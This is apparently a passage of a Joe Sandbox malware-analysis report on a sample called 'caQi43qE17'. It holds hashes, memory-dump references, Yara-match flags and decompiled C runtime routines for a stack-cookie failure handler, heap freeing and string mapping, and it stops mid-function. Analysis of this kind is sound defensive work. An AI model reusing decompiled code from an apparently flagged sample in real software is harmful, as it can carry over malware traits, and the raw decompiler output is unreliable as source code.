                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1219D76504280DFDB16CF14D9C4B16FF62FB84314F24C6A9D8490B656C33AD866CBA2
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363137952.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_74d000_caQi43qE17.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: af20fa5eb6ff981c173d00ecb4108a5abb877ef457d26a956410c01491c5e7cf
                                                                                                                                                                                                    • Instruction ID: 2971111c4429d1e354c074f7a79052f0b40bbb47c51accbdc10e3997220276ce
                                                                                                                                                                                                    • Opcode Fuzzy Hash: af20fa5eb6ff981c173d00ecb4108a5abb877ef457d26a956410c01491c5e7cf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A11D376504280CFDB12CF14D9C4B56BF72FB84324F24C6ADD8490B656C33AD85ACBA2
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363137952.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_74d000_caQi43qE17.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: b20678e0097d3c9abfdfce411ddd3bc17417f5e3c6af047dd3d90a6a4b2757d9
                                                                                                                                                                                                    • Instruction ID: 4b018a9d5c2601470e6773e2431f863cdb2d3d1e436acec719790a6e186b03ef
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b20678e0097d3c9abfdfce411ddd3bc17417f5e3c6af047dd3d90a6a4b2757d9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC012B715043449EE7308B2ACC84B67BFD8EF51364F18C51AEC841B296C37D9C45C6B1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363137952.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_74d000_caQi43qE17.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 9cf9d1a678238b953e33769315341b204c1c6cf3ead62ca5e68c52ffd3ecc63b
                                                                                                                                                                                                    • Instruction ID: 1bcb7b39332a33062f02443db02c3a3e2d87f306418000fe25a98842b5eedf26
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9cf9d1a678238b953e33769315341b204c1c6cf3ead62ca5e68c52ffd3ecc63b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AFF06271504344AEE7208A16CC84B62FFD8EB51764F18C55AED885F296C3799C45CAB1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                    			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                                                                    				intOrPtr _v0;
                                                                                                                                                                                                    				void* _v804;
                                                                                                                                                                                                    				intOrPtr _v808;
                                                                                                                                                                                                    				intOrPtr _v812;
                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                    				intOrPtr _t11;
                                                                                                                                                                                                    				intOrPtr _t12;
                                                                                                                                                                                                    				intOrPtr _t13;
                                                                                                                                                                                                    				long _t17;
                                                                                                                                                                                                    				intOrPtr _t21;
                                                                                                                                                                                                    				intOrPtr _t22;
                                                                                                                                                                                                    				intOrPtr _t25;
                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                    				intOrPtr _t27;
                                                                                                                                                                                                    				intOrPtr* _t31;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t27 = __esi;
                                                                                                                                                                                                    				_t26 = __edi;
                                                                                                                                                                                                    				_t25 = __edx;
                                                                                                                                                                                                    				_t22 = __ecx;
                                                                                                                                                                                                    				_t21 = __ebx;
                                                                                                                                                                                                    				_t6 = __eax;
                                                                                                                                                                                                    				_t34 = _t22 -  *0x422234; // 0xf2638ec2
                                                                                                                                                                                                    				if(_t34 == 0) {
                                                                                                                                                                                                    					asm("repe ret");
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				 *0x423b98 = _t6;
                                                                                                                                                                                                    				 *0x423b94 = _t22;
                                                                                                                                                                                                    				 *0x423b90 = _t25;
                                                                                                                                                                                                    				 *0x423b8c = _t21;
                                                                                                                                                                                                    				 *0x423b88 = _t27;
                                                                                                                                                                                                    				 *0x423b84 = _t26;
                                                                                                                                                                                                    				 *0x423bb0 = ss;
                                                                                                                                                                                                    				 *0x423ba4 = cs;
                                                                                                                                                                                                    				 *0x423b80 = ds;
                                                                                                                                                                                                    				 *0x423b7c = es;
                                                                                                                                                                                                    				 *0x423b78 = fs;
                                                                                                                                                                                                    				 *0x423b74 = gs;
                                                                                                                                                                                                    				asm("pushfd");
                                                                                                                                                                                                    				_pop( *0x423ba8);
                                                                                                                                                                                                    				 *0x423b9c =  *_t31;
                                                                                                                                                                                                    				 *0x423ba0 = _v0;
                                                                                                                                                                                                    				 *0x423bac =  &_a4;
                                                                                                                                                                                                    				 *0x423ae8 = 0x10001;
                                                                                                                                                                                                    				_t11 =  *0x423ba0; // 0x0
                                                                                                                                                                                                    				 *0x423a9c = _t11;
                                                                                                                                                                                                    				 *0x423a90 = 0xc0000409;
                                                                                                                                                                                                    				 *0x423a94 = 1;
                                                                                                                                                                                                    				_t12 =  *0x422234; // 0xf2638ec2
                                                                                                                                                                                                    				_v812 = _t12;
                                                                                                                                                                                                    				_t13 =  *0x422238; // 0xd9c713d
                                                                                                                                                                                                    				_v808 = _t13;
                                                                                                                                                                                                    				 *0x423ae0 = IsDebuggerPresent();
                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                    				E004138FC(_t14);
                                                                                                                                                                                                    				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                    				_t17 = UnhandledExceptionFilter(0x41fb80);
                                                                                                                                                                                                    				if( *0x423ae0 == 0) {
                                                                                                                                                                                                    					_push(1);
                                                                                                                                                                                                    					E004138FC(_t17);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                    			}



















                                                                                                                                                                                                    0x0040ce09
                                                                                                                                                                                                    0x0040ce09
                                                                                                                                                                                                    0x0040ce09
                                                                                                                                                                                                    0x0040ce09
                                                                                                                                                                                                    0x0040ce09
                                                                                                                                                                                                    0x0040ce09
                                                                                                                                                                                                    0x0040ce09
                                                                                                                                                                                                    0x0040ce0f
                                                                                                                                                                                                    0x0040ce11
                                                                                                                                                                                                    0x0040ce11
                                                                                                                                                                                                    0x00413644
                                                                                                                                                                                                    0x00413649
                                                                                                                                                                                                    0x0041364f
                                                                                                                                                                                                    0x00413655
                                                                                                                                                                                                    0x0041365b
                                                                                                                                                                                                    0x00413661
                                                                                                                                                                                                    0x00413667
                                                                                                                                                                                                    0x0041366e
                                                                                                                                                                                                    0x00413675
                                                                                                                                                                                                    0x0041367c
                                                                                                                                                                                                    0x00413683
                                                                                                                                                                                                    0x0041368a
                                                                                                                                                                                                    0x00413691
                                                                                                                                                                                                    0x00413692
                                                                                                                                                                                                    0x0041369b
                                                                                                                                                                                                    0x004136a3
                                                                                                                                                                                                    0x004136ab
                                                                                                                                                                                                    0x004136b6
                                                                                                                                                                                                    0x004136c0
                                                                                                                                                                                                    0x004136c5
                                                                                                                                                                                                    0x004136ca
                                                                                                                                                                                                    0x004136d4
                                                                                                                                                                                                    0x004136de
                                                                                                                                                                                                    0x004136e3
                                                                                                                                                                                                    0x004136e9
                                                                                                                                                                                                    0x004136ee
                                                                                                                                                                                                    0x004136fa
                                                                                                                                                                                                    0x004136ff
                                                                                                                                                                                                    0x00413701
                                                                                                                                                                                                    0x00413709
                                                                                                                                                                                                    0x00413714
                                                                                                                                                                                                    0x00413721
                                                                                                                                                                                                    0x00413723
                                                                                                                                                                                                    0x00413725
                                                                                                                                                                                                    0x0041372a
                                                                                                                                                                                                    0x0041373e

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                                                                                    • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                    • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E0040ADB0(intOrPtr* __ecx) {
                                                                                                                                                                                                    				void* _t5;
                                                                                                                                                                                                    				intOrPtr* _t11;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t11 = __ecx;
                                                                                                                                                                                                    				_t5 =  *(__ecx + 8);
                                                                                                                                                                                                    				 *__ecx = 0x41eff0;
                                                                                                                                                                                                    				if(_t5 != 0) {
                                                                                                                                                                                                    					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if( *(_t11 + 0xc) != 0) {
                                                                                                                                                                                                    					_t5 = GetProcessHeap();
                                                                                                                                                                                                    					if(_t5 != 0) {
                                                                                                                                                                                                    						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t5;
                                                                                                                                                                                                    			}





                                                                                                                                                                                                    0x0040adb3
                                                                                                                                                                                                    0x0040adb5
                                                                                                                                                                                                    0x0040adb8
                                                                                                                                                                                                    0x0040adc0
                                                                                                                                                                                                    0x0040adc8
                                                                                                                                                                                                    0x0040adc8
                                                                                                                                                                                                    0x0040adce
                                                                                                                                                                                                    0x0040add0
                                                                                                                                                                                                    0x0040add8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040ade1
                                                                                                                                                                                                    0x0040add8
                                                                                                                                                                                                    0x0040ade8

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$FreeProcess
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3859560861-0
                                                                                                                                                                                                    • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                    • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363962162.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2460000_caQi43qE17.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 7e0f7542cbd4f9c9fee7600b373eaa7c071831ab8aab0d5223339b9ce5b3ea02
                                                                                                                                                                                                    • Instruction ID: 3846496d86eed097eb6aebf163977e45481d8fdf4be90c48872fe3686ac03b8d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e0f7542cbd4f9c9fee7600b373eaa7c071831ab8aab0d5223339b9ce5b3ea02
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F741D2B4E00649DFDB14CFA9D988AAEBBF1BF09304F20912AE415BB354D7749845CF86
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.363557485.00000000008D6000.00000040.00000020.00020000.00000000.sdmp, Offset: 008D6000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_8d6000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                    • Instruction ID: d0e9d29755664e596f5cf7bf6d6a06d22233578bc10d66a8d99bb3077c684cda
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2311CE72340504AFD700CF59DC81FA673EAFB89360B29816AED04CB386E675EC01C760
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                    			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                    				int _v16;
                                                                                                                                                                                                    				int _v20;
                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                    				signed int _t110;
                                                                                                                                                                                                    				intOrPtr _t112;
                                                                                                                                                                                                    				intOrPtr _t113;
                                                                                                                                                                                                    				short* _t115;
                                                                                                                                                                                                    				short* _t116;
                                                                                                                                                                                                    				char* _t120;
                                                                                                                                                                                                    				short* _t121;
                                                                                                                                                                                                    				short* _t123;
                                                                                                                                                                                                    				short* _t127;
                                                                                                                                                                                                    				int _t128;
                                                                                                                                                                                                    				short* _t141;
                                                                                                                                                                                                    				signed int _t144;
                                                                                                                                                                                                    				void* _t146;
                                                                                                                                                                                                    				short* _t147;
                                                                                                                                                                                                    				signed int _t150;
                                                                                                                                                                                                    				short* _t153;
                                                                                                                                                                                                    				char* _t157;
                                                                                                                                                                                                    				int _t160;
                                                                                                                                                                                                    				long _t162;
                                                                                                                                                                                                    				signed int _t174;
                                                                                                                                                                                                    				signed int _t178;
                                                                                                                                                                                                    				signed int _t179;
                                                                                                                                                                                                    				int _t182;
                                                                                                                                                                                                    				short* _t184;
                                                                                                                                                                                                    				signed int _t186;
                                                                                                                                                                                                    				signed int _t188;
                                                                                                                                                                                                    				short* _t189;
                                                                                                                                                                                                    				int _t191;
                                                                                                                                                                                                    				intOrPtr _t194;
                                                                                                                                                                                                    				int _t207;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t110 =  *0x422234; // 0xf2638ec2
                                                                                                                                                                                                    				_v8 = _t110 ^ _t188;
                                                                                                                                                                                                    				_t184 = __ecx;
                                                                                                                                                                                                    				_t194 =  *0x423e7c; // 0x1
                                                                                                                                                                                                    				if(_t194 == 0) {
                                                                                                                                                                                                    					_t182 = 1;
                                                                                                                                                                                                    					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                                                                                                                                                                                                    						_t162 = GetLastError();
                                                                                                                                                                                                    						__eflags = _t162 - 0x78;
                                                                                                                                                                                                    						if(_t162 == 0x78) {
                                                                                                                                                                                                    							 *0x423e7c = 2;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						 *0x423e7c = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_a16 <= 0) {
                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                    					_t112 =  *0x423e7c; // 0x1
                                                                                                                                                                                                    					if(_t112 == 2 || _t112 == 0) {
                                                                                                                                                                                                    						_v16 = 0;
                                                                                                                                                                                                    						_v20 = 0;
                                                                                                                                                                                                    						__eflags = _a4;
                                                                                                                                                                                                    						if(_a4 == 0) {
                                                                                                                                                                                                    							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _a28;
                                                                                                                                                                                                    						if(_a28 == 0) {
                                                                                                                                                                                                    							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
                                                                                                                                                                                                    						_v24 = _t113;
                                                                                                                                                                                                    						__eflags = _t113 - 0xffffffff;
                                                                                                                                                                                                    						if(_t113 != 0xffffffff) {
                                                                                                                                                                                                    							__eflags = _t113 - _a28;
                                                                                                                                                                                                    							if(_t113 == _a28) {
                                                                                                                                                                                                    								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                                                                                                                                                                    								L78:
                                                                                                                                                                                                    								__eflags = _v16;
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									_push(_v16);
                                                                                                                                                                                                    									E0040B6B5(0, _t182, _t184, __eflags);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t115 = _v20;
                                                                                                                                                                                                    								__eflags = _t115;
                                                                                                                                                                                                    								if(_t115 != 0) {
                                                                                                                                                                                                    									__eflags = _a20 - _t115;
                                                                                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                                                                                    										_push(_t115);
                                                                                                                                                                                                    										E0040B6B5(0, _t182, _t184, __eflags);
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t116 = _t184;
                                                                                                                                                                                                    								goto L84;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                                                                                                                                                                                                    							_t191 =  &(_t189[0xc]);
                                                                                                                                                                                                    							_v16 = _t120;
                                                                                                                                                                                                    							__eflags = _t120;
                                                                                                                                                                                                    							if(_t120 == 0) {
                                                                                                                                                                                                    								goto L58;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                                                                                                                                                                                                    							_v12 = _t121;
                                                                                                                                                                                                    							__eflags = _t121;
                                                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                                                    								if(__eflags <= 0) {
                                                                                                                                                                                                    									L71:
                                                                                                                                                                                                    									_t182 = 0;
                                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                                    									L72:
                                                                                                                                                                                                    									__eflags = _t182;
                                                                                                                                                                                                    									if(_t182 == 0) {
                                                                                                                                                                                                    										goto L62;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									E0040BA30(_t182, _t182, 0, _v12);
                                                                                                                                                                                                    									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                                                                                                                                                                                                    									_v12 = _t123;
                                                                                                                                                                                                    									__eflags = _t123;
                                                                                                                                                                                                    									if(_t123 != 0) {
                                                                                                                                                                                                    										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                                                                                                                                                                                                    										_v20 = _t186;
                                                                                                                                                                                                    										asm("sbb esi, esi");
                                                                                                                                                                                                    										_t184 =  ~_t186 & _v12;
                                                                                                                                                                                                    										__eflags = _t184;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t184 = 0;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									E004147AE(_t182);
                                                                                                                                                                                                    									goto L78;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								__eflags = _t121 - 0xffffffe0;
                                                                                                                                                                                                    								if(_t121 > 0xffffffe0) {
                                                                                                                                                                                                    									goto L71;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t127 =  &(_t121[4]);
                                                                                                                                                                                                    								__eflags = _t127 - 0x400;
                                                                                                                                                                                                    								if(_t127 > 0x400) {
                                                                                                                                                                                                    									_t128 = E0040B84D(0, _t179, _t182, _t127);
                                                                                                                                                                                                    									__eflags = _t128;
                                                                                                                                                                                                    									if(_t128 != 0) {
                                                                                                                                                                                                    										 *_t128 = 0xdddd;
                                                                                                                                                                                                    										_t128 = _t128 + 8;
                                                                                                                                                                                                    										__eflags = _t128;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t182 = _t128;
                                                                                                                                                                                                    									goto L72;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								E0040CFB0(_t127);
                                                                                                                                                                                                    								_t182 = _t191;
                                                                                                                                                                                                    								__eflags = _t182;
                                                                                                                                                                                                    								if(_t182 == 0) {
                                                                                                                                                                                                    									goto L62;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								 *_t182 = 0xcccc;
                                                                                                                                                                                                    								_t182 = _t182 + 8;
                                                                                                                                                                                                    								goto L72;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							L62:
                                                                                                                                                                                                    							_t184 = 0;
                                                                                                                                                                                                    							goto L78;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							goto L58;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(_t112 != 1) {
                                                                                                                                                                                                    							L58:
                                                                                                                                                                                                    							_t116 = 0;
                                                                                                                                                                                                    							L84:
                                                                                                                                                                                                    							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_v12 = 0;
                                                                                                                                                                                                    						if(_a28 == 0) {
                                                                                                                                                                                                    							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t184 = MultiByteToWideChar;
                                                                                                                                                                                                    						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                                                                                                                                    						_t207 = _t182;
                                                                                                                                                                                                    						if(_t207 == 0) {
                                                                                                                                                                                                    							goto L58;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							if(_t207 <= 0) {
                                                                                                                                                                                                    								L28:
                                                                                                                                                                                                    								_v16 = 0;
                                                                                                                                                                                                    								L29:
                                                                                                                                                                                                    								if(_v16 == 0) {
                                                                                                                                                                                                    									goto L58;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                                                                                                                                                                                                    									L52:
                                                                                                                                                                                                    									E004147AE(_v16);
                                                                                                                                                                                                    									_t116 = _v12;
                                                                                                                                                                                                    									goto L84;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t184 = LCMapStringW;
                                                                                                                                                                                                    								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                                                                                                                                                                                                    								_v12 = _t174;
                                                                                                                                                                                                    								if(_t174 == 0) {
                                                                                                                                                                                                    									goto L52;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								if((_a8 & 0x00000400) == 0) {
                                                                                                                                                                                                    									__eflags = _t174;
                                                                                                                                                                                                    									if(_t174 <= 0) {
                                                                                                                                                                                                    										L44:
                                                                                                                                                                                                    										_t184 = 0;
                                                                                                                                                                                                    										__eflags = 0;
                                                                                                                                                                                                    										L45:
                                                                                                                                                                                                    										__eflags = _t184;
                                                                                                                                                                                                    										if(_t184 != 0) {
                                                                                                                                                                                                    											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                                                                                                                                                                                                    											__eflags = _t141;
                                                                                                                                                                                                    											if(_t141 != 0) {
                                                                                                                                                                                                    												_push(0);
                                                                                                                                                                                                    												_push(0);
                                                                                                                                                                                                    												__eflags = _a24;
                                                                                                                                                                                                    												if(_a24 != 0) {
                                                                                                                                                                                                    													_push(_a24);
                                                                                                                                                                                                    													_push(_a20);
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_push(0);
                                                                                                                                                                                                    													_push(0);
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											E004147AE(_t184);
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										goto L52;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t144 = 0xffffffe0;
                                                                                                                                                                                                    									_t179 = _t144 % _t174;
                                                                                                                                                                                                    									__eflags = _t144 / _t174 - 2;
                                                                                                                                                                                                    									if(_t144 / _t174 < 2) {
                                                                                                                                                                                                    										goto L44;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t52 = _t174 + 8; // 0x8
                                                                                                                                                                                                    									_t146 = _t174 + _t52;
                                                                                                                                                                                                    									__eflags = _t146 - 0x400;
                                                                                                                                                                                                    									if(_t146 > 0x400) {
                                                                                                                                                                                                    										_t147 = E0040B84D(0, _t179, _t182, _t146);
                                                                                                                                                                                                    										__eflags = _t147;
                                                                                                                                                                                                    										if(_t147 != 0) {
                                                                                                                                                                                                    											 *_t147 = 0xdddd;
                                                                                                                                                                                                    											_t147 =  &(_t147[4]);
                                                                                                                                                                                                    											__eflags = _t147;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t184 = _t147;
                                                                                                                                                                                                    										goto L45;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									E0040CFB0(_t146);
                                                                                                                                                                                                    									_t184 = _t189;
                                                                                                                                                                                                    									__eflags = _t184;
                                                                                                                                                                                                    									if(_t184 == 0) {
                                                                                                                                                                                                    										goto L52;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									 *_t184 = 0xcccc;
                                                                                                                                                                                                    									_t184 =  &(_t184[4]);
                                                                                                                                                                                                    									goto L45;
                                                                                                                                                                                                    								}
